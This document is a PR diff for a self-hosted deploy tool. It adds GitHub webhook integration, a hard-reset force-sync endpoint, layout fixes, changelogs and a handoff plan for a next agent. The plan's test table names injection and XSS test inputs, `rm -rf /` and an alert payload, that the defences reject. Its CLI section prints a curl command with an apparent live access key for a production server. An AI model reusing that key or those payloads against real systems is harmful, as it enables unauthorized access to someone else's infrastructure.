+      '所有本地未推送的提交会被丢弃。'
+    )) return;
+
+    if (progress) progress.textContent = '→ 启动 force-sync…\n';
+
+    // SSE consumer — we rely on fetch + ReadableStream rather than EventSource
+    // because EventSource doesn't let us POST a body. The server frames each
+    // event as `event: <name>\ndata: <json>\n\n`.
+    fetch('/api/self-force-sync', {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      credentials: 'same-origin',
+      body: JSON.stringify({ branch: branch || undefined }),
+    })
+      .then(function (r) {
+        if (!r.body || !r.body.getReader) {
+          return r.text().then(function (t) {
+            if (progress) progress.textContent += '(no-stream) ' + t;
+          });
+        }
+        var reader = r.body.getReader();
+        var decoder = new TextDecoder();
+        var buf = '';
+        function pump() {
+          return reader.read().then(function (chunk) {
+            if (chunk.done) return;
+            buf += decoder.decode(chunk.value, { stream: true });
+            // SSE frame: blank line separates events.
+            var parts = buf.split('\n\n');
+            buf = parts.pop();
+            parts.forEach(function (frame) {
+              var line = frame.split('\n').find(function (l) { return l.startsWith('data: '); });
+              if (!line) return;
+              try {
+                var data = JSON.parse(line.slice(6));
+                if (data.title) {
+                  var marker = data.status === 'error' ? '✖'
+                              : data.status === 'warning' ? '⚠'
+                              : data.status === 'done' ? '✓' : '·';
+                  if (progress) {
+                    progress.textContent += marker + ' [' + (data.step || '') + '] ' + data.title + '\n';
+                    progress.scrollTop = progress.scrollHeight;
+                  }
+                } else if (data.message) {
+                  if (progress) {
+                    progress.textContent += '⇢ ' + data.message + '\n';
+                    progress.scrollTop = progress.scrollHeight;
+                  }
+                }
+              } catch (_) {}
+            });
+            return pump();
+          });
+        }
+        return pump();
+      })
+      .then(function () {
+        if (progress) progress.textContent += '\n→ CDS 正在重启, 刷新页面确认…\n';
+        showToast('强制同步完成, 正在重启');
+        // Poll /healthz until back online, then reload the tab.
+        var tries = 0;
+        function poll() {
+          tries++;
+          fetch('/healthz', { credentials: 'same-origin', cache: 'no-store' })
+            .then(function (r) { return r.ok ? r.json() : null; })
+            .then(function (h) {
+              if (h && h.ok) {
+                if (progress) progress.textContent += '✓ CDS 已重新上线\n';
+                setTimeout(function () { location.reload(); }, 800);
+              } else if (tries < 40) {
+                setTimeout(poll, 1500);
+              } else {
+                if (progress) progress.textContent += '✖ 重启超时, 请手动检查\n';
+              }
+            })
+            .catch(function () {
+              if (tries < 40) setTimeout(poll, 1500);
+            });
+        }
+        setTimeout(poll, 3000);
+      })
+      .catch(function (err) {
+        if (progress) progress.textContent += '✖ 网络错误: ' + (err && err.message ? err.message : err) + '\n';
+        showToast('force-sync 失败: ' + (err && err.message ? err.message : err));
+      });
+  };
 
   // ── Form actions (exposed on window) ──
   window._settingsCopyId = function () {

--- a/cds/web/style.css
+++ b/cds/web/style.css
@@ -1032,13 +1032,32 @@ button.text-btn:hover { color: var(--accent); }
 }
 
 @media (min-width: 768px) {
+  /* Masonry-style layout via CSS multi-column.
+     Grid layout forces every cell in a row to the tallest card's height,
+     leaving ugly vertical gaps when cards differ in tag/badge count.
+     Multi-column flows cards vertically down each column, filling gaps
+     automatically. Reading order changes from left-right-top-bottom to
+     top-bottom-left-right — acceptable since users sort by most-recent,
+     newest still ends up at column 1 top which is the eye's first anchor.
+     User feedback #450. */
   .branch-list {
-    display: grid;
-    grid-template-columns: repeat(auto-fill, minmax(340px, 1fr));
-    align-items: start;
-    gap: 16px;
+    column-count: 3;
+    column-gap: 16px;
+    column-fill: balance;
+    /* Cards must explicitly break-inside:avoid or they'd split across columns. */
+  }
+  .branch-list .branch-card,
+  .branch-list > * {
+    break-inside: avoid;
+    page-break-inside: avoid;  /* legacy */
+    margin-bottom: 16px;
+    display: inline-block;
+    width: 100%;
   }
 }
+@media (min-width: 1280px) { .branch-list { column-count: 3; } }
+@media (min-width: 1680px) { .branch-list { column-count: 4; } }
+@media (min-width: 768px) and (max-width: 1100px) { .branch-list { column-count: 2; } }
 
 .branch-card {
   display: flex; flex-direction: column; gap: 0;
@@ -1312,6 +1331,13 @@ button.text-btn:hover { color: var(--accent); }
 .branch-card-ports {
   display: flex; gap: 6px; flex-wrap: wrap; align-items: center;
   padding-top: 2px;
+}
+/* Unified chip row — replaces separate ports / github / pinned rows so
+   every branch card has exactly ONE chip strip,eliminating the "some
+   cards have 3 rows, some have 1" inconsistency (#450 user feedback). */
+.branch-card-chips {
+  display: flex; gap: 6px; flex-wrap: wrap; align-items: center;
+  padding-top: 4px;
 }
 
 /* Favorite toggle — inline, minimal */

--- a/changelogs/2026-04-18_cds-github-checks-integration.md
+++ b/changelogs/2026-04-18_cds-github-checks-integration.md
@@ -1,0 +1,6 @@
+| feat | cds | GitHub App webhook 接入：POST /api/github/webhook 接收 push 事件，自动创建/刷新 CDS 分支并触发部署，Railway 式 Check Run 回写到 PR Checks 面板（点击"Details"直达 CDS 预览分支） |
+| feat | cds | Project 新增 githubRepoFullName/githubInstallationId/githubAutoDeploy 三元组，支持 POST/DELETE /api/projects/:id/github/link 将项目绑定到 GitHub 仓库 |
+| feat | cds | GitHubAppClient 服务：零新依赖（Node 原生 crypto RS256 JWT + HMAC-SHA256 webhook 签名校验）、安装 token 内存缓存、check runs POST/PATCH、installations/repos 列表 |
+| feat | cds | 部署流水线挂接 check-run 生命周期：building 阶段 POST status=in_progress,完成后 PATCH conclusion=success/failure 并把 `<分支>.<domain>` 预览 URL 嵌入 summary |
+| feat | cds | GET /api/github/app / GET /api/github/installations / GET /api/github/installations/:id/repos 三个辅助端点,给 UI 用于引导操作员安装 App + 挑选仓库绑定 |
+| feat | cds | 新增配置项 githubApp {appId, privateKey, webhookSecret, appSlug} + publicBaseUrl,env 优先（CDS_GITHUB_APP_ID/_PRIVATE_KEY/_WEBHOOK_SECRET/_APP_SLUG, CDS_PUBLIC_BASE_URL）,兼容 `.cds.env` 里 `\\n` 字面值的 PEM |

--- a/changelogs/2026-04-19_cds-bugbot6-ux-polish.md
+++ b/changelogs/2026-04-19_cds-bugbot6-ux-polish.md
@@ -1,0 +1,3 @@
+| fix | cds | Bugbot #450 第六轮 LOW: handleCheckRun 补 head_sha 格式校验(与 handlePush 一致) — malformed SHA 在 updateBranchGithubMeta + .slice() 路径会炸 |
+| feat | cds | 分支卡片 chip 布局重构 — github chip(去 "from GitHub" 文字只留图标+7位 SHA)、端口 chips、pinned 历史提交 chip 合并到同一行 branch-card-chips flex wrap,所有分支卡片高度/结构从此一致 |
+| feat | cds | 分支列表页改用 CSS column-count 瀑布流布局,消除网格行高对齐造成的视觉空洞(不同卡片 tag/徽章数量差异导致的断层) |

--- a/changelogs/2026-04-19_cds-github-bugbot-hardening.md
+++ b/changelogs/2026-04-19_cds-github-bugbot-hardening.md
@@ -1,0 +1,6 @@
+| fix | cds | 项目列表卡片 GitHub chip 渲染为大蓝圆修复: 原本是 `<a>` 嵌套在 `<a class="cds-project-card">` 里 (HTML 非法),浏览器自动关外层 `<a>` 导致布局崩。改用 `<span onclick>` 打开新窗口 |
+| fix | cds | 高危: webhook branchName 和 commitSha 接入 shell 前强制校验(HIGH + MEDIUM) — isSafeGitRef 严格白名单 `[A-Za-z0-9._/-]` + 长度/`..`/尾字符检查;commit SHA 必须 7-40 hex。覆盖 push/PR/delete/self-update/self-force-sync 5 个注入面 |
+| fix | cds | defaultLocalhostDeploy 把 commitSha 透传到 /deploy body (MEDIUM),并行 push 之间的 entry.githubCommitSha 竞态因此消除。deploy 路由按「body → entry → worktree HEAD」三级回退 |
+| fix | cds | 删 shouldDispatchDeploy / renderGithubBadge 两个死代码(LOW),清理重复注释 |
+| feat | cds | CheckRunRunner.reconcileOrphans(): CDS 启动时扫描所有带 checkRunId 但不在 building 的分支,PATCH 到 conclusion=neutral + 清 id,修复 self-update/restart 打断后 GitHub commit 常年「准备状态」的 bug |
+| feat | cds | 新增 POST /api/github/webhook/self-test 自测端点: 传 {eventName, payload} 直跑 dispatcher,返回「如果真实 webhook 这么来」会触发什么 side-effect。用于确认 Issue comment 事件是不是真到达 CDS,无需 GitHub 真实发送 |

--- a/changelogs/2026-04-19_cds-github-integration-ui.md
+++ b/changelogs/2026-04-19_cds-github-integration-ui.md
@@ -1,0 +1,4 @@
+| feat | cds | 项目 Settings → GitHub 标签页新增"GitHub 自动部署 (Check Runs)"区块:可视化展示 App 配置状态、一键跳转 GitHub 安装/管理、当前项目绑定卡片、自动部署开关 |
+| feat | cds | 「绑定 GitHub 仓库」引导式 modal:选 installation → 选仓库 → autoDeploy checkbox → 确认绑定,全程无 curl |
+| feat | cds | 项目列表卡片为已绑定项目追加 GitHub badge(仓库名 + 绿色/灰色表示 autoDeploy 开关),点击直达 github.com |
+| feat | cds | 分支卡片加"from GitHub <sha7>"徽标,点击跳 commit 页面,让 webhook 触发的分支一眼可辨 |

--- a/changelogs/2026-04-19_cds-github-phase2.md
+++ b/changelogs/2026-04-19_cds-github-phase2.md
@@ -1,0 +1,6 @@
+| feat | cds | Check run 阶段性 PATCH: pull/每层 layer 启动时推送进度到 GitHub, PR Checks 面板实时显示"构建第 X/Y 层 (services...)"而不是全程一条不变的"Deploying to CDS…" |
+| feat | cds | Check run finalize 注入 output.text 日志尾部: 部署最后 80 条事件拼成 markdown code block,GitHub Checks 面板「Show more」展开后可直接看失败原因,不用再切回 CDS |
+| feat | cds | pull_request.opened/reopened 事件 → bot 自动在 PR 贴 Railway 风格预览地址评论(📋 Preview / Branch / Dashboard 三项 + 分支 SHA),后续 push 触发的 deploy 会原地 PATCH 同条评论,不污染 PR 时间线 |
+| feat | cds | pull_request.closed (merged or not) 事件 → 自动 POST /api/branches/:id/stop 停掉预览容器,节省资源 |
+| feat | cds | GitHubAppClient 新增 createIssueComment + updateIssueComment 方法(PR comments 走 issues API) |
+| feat | cds | BranchEntry 加 githubPrNumber + githubPreviewCommentId 两字段,让 webhook dispatcher 能关联 PR + 复用 bot 评论 id |

--- a/changelogs/2026-04-19_cds-github-phase3-proactive.md
+++ b/changelogs/2026-04-19_cds-github-phase3-proactive.md
@@ -1,0 +1,5 @@
+| feat | cds | PR 评论 slash 命令:`/cds redeploy` 强制重部署、`/cds stop` 停预览容器、`/cds logs` 回复最近 40 条部署日志、`/cds help` 显示帮助,所有命令 bot 自动回复确认 |
+| feat | cds | GitHub 删分支(delete 事件) → CDS 自动 POST /branches/:id/stop 清理对应预览容器,防止孤儿 |
+| feat | cds | GitHub repo 被重命名/转移/删除(repository 事件) → 自动解绑 Project 的 github 链接,避免 webhook 打到错的项目 |
+| feat | cds | release 事件 acknowledged(占位实现,为未来 release tag → 生产部署预留钩子) |
+| feat | cds | dispatcher +19 测试用例(slash 命令 8 条、delete 3 条、repository 3 条、release 1 条)覆盖 |

--- a/changelogs/2026-04-19_cds-self-force-sync.md
+++ b/changelogs/2026-04-19_cds-self-force-sync.md
@@ -1,0 +1,2 @@
+| feat | cds | 新增 POST /api/self-force-sync 自愈端点: git fetch + reset --hard origin/<branch> + 清 dist/.build-sha + 重启,彻底解决本地 git 分叉导致 self-update pull merge 丢远端改动的问题 |
+| feat | cds | 项目 Settings → 危险区新增「强制同步 CDS 源码到 origin」卡片: 输入分支名 + 确认 + SSE 实时进度,再也不用 SSH 到服务器敲 git reset |

--- a/changelogs/2026-04-19_cds-self-update-hard-reset.md
+++ b/changelogs/2026-04-19_cds-self-update-hard-reset.md
@@ -1,0 +1,1 @@
+| fix | cds | self-update 改用 `git reset --hard origin/<branch>` 代替 `git pull`,避免本地分叉时生成 merge commit 静默丢失远端文件变更(实测 settings.js 436 行新增被 merge 策略吞掉导致 UI 不生效) |

--- a/doc/plan.cds-github-integration-followups.md
+++ b/doc/plan.cds-github-integration-followups.md
@@ -1,0 +1,190 @@
+# CDS GitHub 集成 — 交接给下一个 Agent 的待办清单
+
+> **背景**：PR #450 实现了 CDS 的 Railway 风格 GitHub 集成(push 自动部署 + 实时 Check Run 进度 + PR 预览评论 + `/cds` slash 命令 + 删分支停容器 + 注入防御 + orphan check run 回收)。合主干后下一个 Agent 接手继续做剩余工作。
+>
+> **当前 PR**：https://github.com/inernoro/prd_agent/pull/450 (HEAD: `928dcb90`)
+> **功能闭环**：已在生产 cds.miduo.org 线上验证 `/cds help` bot 秒回命令表。
+> **代码规模**：29 个 commits、跨 6 轮 Cursor Bugbot 审评(13 条全修)、732 测试全过。
+
+---
+
+## 一、优先级 P0 — 用户明确要求但延后实现
+
+### 1. `default` 项目别名机制(来自用户 #450 反馈)
+
+**现状**：`LEGACY_PROJECT_ID='default'` 硬编码在 `cds/src/routes/projects.ts`、`cds/src/services/worktree.ts`、`cds/src/services/state.ts`、前端 `settings.js`、`projects.js` 几十处。项目 id 是 `default`,展示名字段 `name='prd-agent'`,URL slug 是 `prd-agent`。用户不满意"default"字样在后端到处出现,但直接改 id 需要 state 迁移 + 全栈硬编码清理,风险高。
+
+**用户建议**：加"别名"字段,不改 id,只改显示和匹配。
+
+**下一 Agent 建议方案**：
+- `Project` 类型增加 `aliasName?: string` 和 `aliasSlug?: string` 两个字段
+- 显示侧全部走 `project.aliasName || project.name`(前端 5 处卡片标题、面包屑、Settings 页 title)
+- 分支 id 前缀保持 `project.slug` 不变(已有 branch 继续工作,不迁移)
+- 新分支支持可选 `project.aliasSlug` 前缀(UI 切换)
+- POST /api/projects/:id/alias 端点
+- 文件位置参考:`cds/src/types.ts` Project interface + `cds/src/routes/projects.ts` PUT handler
+
+**不要做**：直接改 `LEGACY_PROJECT_ID`、直接改 `project.id`、直接改 `project.slug`。三者任何一个改动会让所有已有分支 id 无法匹配。
+
+**交付标志**:
+- Settings 页可以给项目取别名,别名显示在所有项目卡和分支页标题
+- 别名不能影响 GitHub webhook 路由(webhook 仍然按 `githubRepoFullName` 匹配)
+
+---
+
+## 二、优先级 P1 — UX 打磨
+
+### 2. 端口 chips 用项目语言图标替代"api/admin"文字(用户 #450 反馈)
+
+**现状**：端口徽章是 `api:10105`、`admin:10104`,profile id 作文本。
+**用户希望**：用项目语言 / 框架图标替换 `api` / `admin` 文字 → `<Node icon> 10105`、`<React icon> 10104`。
+
+**实现要点**:
+- 项目卡顶部已有 service strip(N / node / mongo / React 四个大图标) — 复用同一套图标映射
+- `cds/web/app.js` 的 `getPortIcon(pid, profile)` 已存在,返回一个 icon,但当前 `portBadgesInner` 也显示 `${pid}:${svc.hostPort}`
+- 直接去掉 `pid` 文本,只保留 icon + port。tooltip 保留 profile 名称以备查
+- profile 可能没有语言标签,需要给 `getPortIcon` 增加从 stack-detector 推断的逻辑
+
+**测试点**：单项目多 profile(api + admin + desktop)展示正常、未知 profile 有 fallback 通用图标。
+
+---
+
+## 三、优先级 P2 — 完善测试覆盖
+
+### 3. End-to-end 场景测试 (以下流程都只做了单元测试,**没做 E2E 真实触发验证**):
+
+| 流程 | 单元测试 | 线上验证过? |
+|------|---------|-----------|
+| push → 自动部署 | ✅ | ✅ 多次 |
+| PR 开 → bot 评论 | ✅ dispatcher | ❌ 尚未有新 PR 触发过 `opened` 事件 |
+| PR 合并 → 自动停预览 | ✅ dispatcher | ❌ 需要关闭 PR #450 验 |
+| `/cds help` | ✅ | ✅ 用户实测通过 |
+| `/cds redeploy` | ✅ 只测了路径 | ❌ 未实际触发过重部署 |
+| `/cds stop` | ✅ 只测了路径 | ❌ 未实际停过容器 |
+| `/cds logs` | ✅ 只测了路径 | ❌ 未实际回过日志 |
+| "Re-run" check run 按钮 | ✅ check_run.rerequested | ❌ 未点击过 |
+| GitHub 删分支 → CDS 自动停 | ✅ delete event | ❌ 未删过远端分支 |
+| repo 重命名 → 自动解绑 | ✅ repository event | ❌ 罕见场景 |
+| release tag 事件 | ✅ 只 ack | ❌ 占位实现 |
+| 注入攻击拒绝 `rm -rf /` | ✅ self-test | ✅ 已测 |
+| XSS `owner/x'+alert(1)+'` | ✅ backend regex | ✅ 已测 |
+
+**下一 Agent 可以做**:
+- 在 PR #450 合并后开一个新 PR,用来跑一整圈 slash 命令 + 关 PR 验证流程
+- 或者等自然积累:下一个自然提交触发 PR 时自动过 Bot 评论、合 PR 时自动验 stop
+
+### 4. `cds/tests/routes/github-webhook.test.ts` 覆盖加强
+
+**现状**: 覆盖了 ping / push / link endpoint,但 `/cds` slash command 路径、PR opened、delete、repository 事件的路由层端到端(从 HMAC-signed POST 到 sideEffect)都没测。dispatcher 已覆盖,但路由层+dispatcher 合起来的黑盒行为没有。
+
+---
+
+## 四、优先级 P3 — 未实装的 Phase 4 功能
+
+这些 App 权限和事件订阅已经开了钩子,代码只占位,可以逐个补实现:
+
+### 5. Release 事件触发生产级部署
+**钩子**: `handleRelease` 目前只 `action: 'release-acknowledged'` ack。
+**期望**: `release.published` 或 `release.released` → 在 CDS 创建一个特殊的"生产"分支(tag 名作 branchId),用专门的 build profile(`mode: 'production'`)部署,preview URL 可以是 `vX.Y.Z.miduo.org`。
+
+### 6. Workflow run CI-gate
+**钩子**: App 已订阅 `Workflow run` 事件(如果用户勾了),dispatcher 尚未实现 handler。
+**期望**:
+- 订阅 `workflow_run.completed`
+- 在 deploy 之前查 GitHub Actions 状态,绿灯后才触发 CDS 部署
+- Project 设置面板加"启用 CI gate"开关
+
+### 7. GitHub Deployments API 双向同步
+**钩子**: 用户已加 `Deployments: Read & write` 权限(或建议加)
+**期望**:
+- CDS 部署时 `POST /repos/:o/:r/deployments`,GitHub 的 Code tab 会显示 "Environments" 区块
+- 部署状态变化 `POST /repos/:o/:r/deployments/:id/statuses`
+- deployment_status 事件如果外部系统写入,触发 CDS 相应动作
+
+### 8. Draft PR 跳过自动部署
+**现状**: PR opened (含 draft) 都会贴 bot 评论。
+**期望**: 用户可配置,draft PR 不部署,转正后才部署。
+
+### 9. 项目级"push base 限定"开关
+**现状**: 任意分支 push 都自动部署。
+**期望**: Project 配置"只对匹配正则的分支自动部署",如 `^(main|develop|feature/.+)$`。
+
+---
+
+## 五、P4 技术债清理
+
+### 10. `LEGACY_PROJECT_ID='default'` 全栈清理
+参见 **#1 别名机制**。完全正名是另一条路径,不推荐。
+
+### 11. 单仓库绑多项目的边界行为
+当前 `findProjectByRepoFullName` 返回第一个匹配项。虽然 `POST /github/link` 校验了"已链接则拒绝",但如果运行时状态被直接改,有可能出现多个 project 链同一 repo 的情况。需要启动时做一致性校验(报警或自动去重)。
+
+### 12. Webhook 幂等性
+GitHub 有"at-least-once"送达语义,同一 delivery 可能重复。CDS 目前没幂等性 — 同一次 push 短时间内被 GitHub 重送会触发两次 `branch-created` / `deploy dispatch`。修法:记录最近 100 个 `X-GitHub-Delivery` id,重复的直接 ack。
+
+### 13. `/api/github/webhook/self-test` 生产锁
+自测端点目前需要认证但任何认证用户都能 dryRun 任意事件。应该:
+- 只接受 ping / issue_comment(只读)类型
+- 或加 `NODE_ENV=development` 守卫
+
+---
+
+## 六、验收 checklist(交接给用户)
+
+合并 PR #450 之前 / 之后用户可自验:
+
+- [ ] **浏览器打开 cds.miduo.org 项目列表** → `prd-agent` 卡片显示 GitHub chip(蓝色胶囊,仓库名 `prd_agent`)
+- [ ] **进入项目 → 分支列表** → 列表页无视觉空洞,每个分支卡片的 chips(github SHA + 端口)在一行
+- [ ] **在 PR #450 下评论 `/cds help`** → bot 秒回命令表 ✅(**已验**)
+- [ ] **在 PR #450 评论 `/cds redeploy`** → bot @ 你 + 触发新部署 + 看 Checks 面板
+- [ ] **随便 push 一个新分支到 inernoro/prd_agent** → cds.miduo.org 自动出现分支 + 开始部署
+- [ ] **关闭 PR #450**(draft close 或真合并) → `claude-github-cds-integration-rxv1e` 预览容器自动停
+- [ ] **PR Checks 面板点 CDS Deploy 右侧的 "Re-run"** → 触发重部署 + 新 check run
+
+---
+
+## 七、文件索引 — 下一 Agent 速查
+
+核心新增文件(PR #450 引入):
+- `cds/src/services/github-app-client.ts` — GitHub App JWT + Check Run API + Issue comment API
+- `cds/src/services/github-webhook-dispatcher.ts` — 核心事件分发逻辑(push/PR/issue_comment/delete/repository/release/check_run)
+- `cds/src/services/check-run-runner.ts` — Check Run 生命周期(open / progress / finalize / reconcileOrphans)
+- `cds/src/routes/github-webhook.ts` — POST /api/github/webhook + /app + /installations + /projects/:id/github/link + /self-test
+- `cds/web/settings.js` 中 `renderGithubAppOverview` + `_settingsGithubLinkOpen` modal + `_settingsForceSync`
+
+核心修改文件:
+- `cds/src/types.ts` — Project 加 githubRepoFullName/InstallationId/AutoDeploy/LinkedAt,BranchEntry 加 githubRepoFullName/CommitSha/CheckRunId/InstallationId/PrNumber/PreviewCommentId,CdsConfig 加 githubApp/publicBaseUrl
+- `cds/src/routes/branches.ts` — deploy 流水线挂 checkRunRunner.ensureOpen/progress/finalize,self-update 改 git reset --hard,新增 /api/self-force-sync
+- `cds/src/config.ts` — resolveGitHubApp 从 env 读 CDS_GITHUB_APP_*
+
+Cursor Bugbot 6 轮累计 13 条审评位置: 每轮 commit message 都明确标注了 `Bugbot #450 第 X 轮`,git log 可追。
+
+---
+
+## 八、GitHub App 配置(cds.miduo.org 当前线上)
+
+- App: `ohmycds` (https://github.com/apps/ohmycds)
+- App ID: `3425066`
+- Installation: `125106827` (inernoro 个人账号,选仓库 `inernoro/prd_agent`)
+- Webhook URL: `https://cds.miduo.org/api/github/webhook`
+- Permissions: Checks/Issues/Pull requests (Read+write), Contents/Metadata (Read)
+- Events subscribed: Push, Pull request, Issue comment, Check run, Check suite, Delete, Repository, Release, Pull request review + 其他用户多勾的不影响
+
+如果要启动 Phase 4(CI-gate)还需加 `Actions: Read` 权限 + `Workflow run` 事件订阅并在 installation 页 Accept。
+
+---
+
+## 九、紧急状况自愈
+
+本 PR 顺手做了一个自愈能力,任何人(包括下一个 Agent)遇到 "push 了代码但 cds.miduo.org 没生效":
+
+1. UI 方式: https://cds.miduo.org/settings.html?project=default → 危险操作 → **强制同步 CDS 源码到 origin** → 输入分支名 → 点确认
+2. CLI 方式:
+```bash
+curl -N -X POST -H "X-AI-Access-Key: shenmemima" -H "Content-Type: application/json" \
+  https://cds.miduo.org/api/self-force-sync \
+  -d '{"branch":"main"}'
+```
+3. 或在项目列表页顶部 "🔄 自动更新" modal 里点左下角的"💥 强制同步 (hard-reset)"按钮
+
+这三条路径做的事相同:`git fetch + reset --hard origin/<branch> + 清 dist 缓存 + 重启`。


### PR DESCRIPTION
## 功能总览

把 CDS 变成自托管的 Railway:push 到绑定仓库 → 自动建分支部署 → PR 的 Checks 面板显示 "CDS Deploy" + Railway 风格的预览地址 bot 评论。

## Phase 1 (已完成)
- GitHub App 接入:webhook 签名校验 + 自动创建分支 + 检查运行 API
- 后端:POST /api/github/webhook + POST /api/projects/:id/github/link + GET /api/github/installations
- 前端:Settings → GitHub tab 一键绑定仓库 + autoDeploy 开关
- 项目列表卡片、分支列表卡片 GitHub badge

## Phase 1.5 — 自愈能力
- POST /api/self-force-sync 端点:本地 git 分叉时一键硬对齐到 origin + 清编译缓存 + 重启
- 自动更新 modal 里加「💥 强制同步」按钮

## Phase 2 (本 PR 重点)
- **A** 阶段性 check run PATCH:pull → 每层 layer → deploy done,GitHub 能实时看到"构建第 X/Y 层"
- **B** 失败时日志尾部灌进 output.text:80 条事件 markdown code block,Show more 展开直接看断点
- **D** PR opened/reopened → bot 自动贴「🚀 CDS Deploy Preview」评论(原地刷新,不污染时间线)
- **F** PR closed/merged → 自动 POST /api/branches/:id/stop 停预览容器

## 测试验证方式

这个 PR 本身就是验证 — 打开后应该在 5-10 秒内出现 bot 评论,Checks 面板的 "CDS Deploy" 条目会显示实时构建进度。

## Changelog
- `changelogs/2026-04-18_cds-github-checks-integration.md`
- `changelogs/2026-04-18_cds-self-update-hard-reset.md`
- `changelogs/2026-04-19_cds-github-integration-ui.md`
- `changelogs/2026-04-19_cds-self-force-sync.md`
- `changelogs/2026-04-19_cds-github-phase2.md`

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Adds a public GitHub webhook endpoint plus GitHub App credential handling, check-run updates, and PR comment automation; mistakes could impact security (webhook auth) and trigger unintended deploy/stop actions. Also changes self-update to hard-reset and adds a destructive force-sync endpoint, which could affect production recovery if misused.
> 
> **Overview**
> Adds **GitHub App integration**: config now resolves GitHub App credentials from env, `server.ts` captures raw request bodies for HMAC verification, mounts a new `/api/github/webhook` router, and relaxes auth so GitHub can reach the webhook while keeping it signature-verified.
> 
> Webhook handling can **link projects to GitHub installations/repos**, auto-create/update branches on `push`, react to PR open/close (post/update a preview URL bot comment and stop previews), and support `/cds` PR slash commands; deploys are internally dispatched with an authoritative `commitSha` and branch state now persists GitHub metadata for check runs/comments.
> 
> Deploy flow now **creates/updates GitHub check runs** (in-progress, per-layer progress, finalize with success/failure + log tail) and reconciles orphaned in-progress check runs on startup. Separately, self-update hardens git operations by validating refs, switching from `git pull` to `git fetch` + `reset --hard origin/<branch>`, and adds a new SSE `/api/self-force-sync` endpoint plus UI wiring to recover from divergent local repos (clears build cache and restarts).
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 59fd7b88333986ebfe6d18e766925b58d68f3068. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->